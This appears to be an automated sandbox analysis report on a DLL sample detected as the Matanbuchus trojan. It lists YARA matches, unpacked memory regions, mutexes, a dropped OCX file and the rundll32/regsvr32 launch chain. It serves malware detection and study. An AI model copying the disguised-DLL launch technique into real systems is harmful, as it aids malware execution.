Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EE0FA26		13_2_7EE0FA26
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDDEA20		13_2_7EDDEA20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDE76F0		13_2_7EDE76F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDE58DA		13_2_7EDE58DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EE0895D		13_2_7EE0895D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EE0A900		13_2_7EE0A900
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDDD6D0		13_2_7EDDD6D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EE0F698		13_2_7EE0F698
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDFA7DC		13_2_7EDFA7DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDDF744		13_2_7EDDF744
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDF84C0		13_2_7EDF84C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDE0490		13_2_7EDE0490
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDFB44F		13_2_7EDFB44F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDD558D		13_2_7EDD558D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EE1736C		13_2_7EE1736C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EE04350		13_2_7EE04350
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDB7310		13_2_7EDB7310
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDE60E0		13_2_7EDE60E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDFB005		13_2_7EDFB005
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDE3180		13_2_7EDE3180
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDFA1B9		13_2_7EDFA1B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7D9F70		18_2_7F7D9F70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7B0FF0		18_2_7F7B0FF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7DBFC0		18_2_7F7DBFC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7C3FA0		18_2_7F7C3FA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7B6D40		18_2_7F7B6D40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7C4D00		18_2_7F7C4D00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7C76F0		18_2_7F7C76F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7BD6D0		18_2_7F7BD6D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7AF690		18_2_7F7AF690
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7E4350		18_2_7F7E4350
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F797310		18_2_7F797310
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7CD200		18_2_7F7CD200
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7C3180		18_2_7F7C3180
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7C60E0		18_2_7F7C60E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_6B5115B0		36_2_6B5115B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F103FA0		36_2_7F103FA0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F11BFC0		36_2_7F11BFC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0F0FF0		36_2_7F0F0FF0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0EF690		36_2_7F0EF690
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F1076F0		36_2_7F1076F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0F6D40		36_2_7F0F6D40
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0D7310		36_2_7F0D7310
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F124350		36_2_7F124350
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F10D200		36_2_7F10D200
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F103180		36_2_7F103180
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F1060E0		36_2_7F1060E0

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 7F7F17CD appears 126 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 7F7E3810 appears 31 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 7EE117CD appears 150 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 7F1317CD appears 132 times

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7584 -s 612

Source: useraccount.aspx.dll

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL

Source: useraccount.aspx.dll, type: SAMPLE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: sslproxydump.pcap, type: PCAP	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 36.2.regsvr32.exe.7f0b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 36.2.regsvr32.exe.7f0b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 13.2.rundll32.exe.7ed90000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 13.2.rundll32.exe.7ed90000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 13.2.rundll32.exe.7ed90000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 13.2.rundll32.exe.7ed90000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 36.2.regsvr32.exe.7f0b0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 36.2.regsvr32.exe.7f0b0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 18.2.rundll32.exe.6cef0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 13.2.rundll32.exe.6cef0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 22.2.rundll32.exe.6cef0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 18.2.rundll32.exe.7f770000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 18.2.rundll32.exe.7f770000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 36.2.regsvr32.exe.6b4a0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 13.2.rundll32.exe.52c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 18.2.rundll32.exe.7f770000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 18.2.rundll32.exe.7f770000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 13.2.rundll32.exe.52c0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 0000000D.00000002.2509315820.0000000005558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 0000000D.00000002.2509315820.0000000005558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000024.00000002.1656219825.000000007F0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000024.00000002.1656219825.000000007F0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000024.00000002.1655827113.000000006B4A1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 0000000D.00000002.2509711565.000000006CEF1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000012.00000002.1540406288.000000007F770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000012.00000002.1540406288.000000007F770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 0000000D.00000002.2508577528.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000012.00000002.1539682378.000000006CEF1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000024.00000002.1655732587.00000000050B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000024.00000002.1655732587.00000000050B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000012.00000002.1539552118.0000000004B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000012.00000002.1539552118.0000000004B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000016.00000002.1663869871.000000006CEF1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: C:\Users\user\8f08\user-PC\user-PC.ocx, type: DROPPED	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12

Source: classification engine

Classification label: mal100.troj.evad.winDLL@52/7@3/2

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Users\user\8f08

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7764:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\8f08
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7584
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6764:120:WilError_03

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\f03c22d8-5435-4c04-83ee-cce6b2ae6093

Source: useraccount.aspx.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\rundll32.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\useraccount.aspx.dll,DllInit

Source: useraccount.aspx.dll

Virustotal: Detection: 27%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\useraccount.aspx.dll,DllInit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",#1
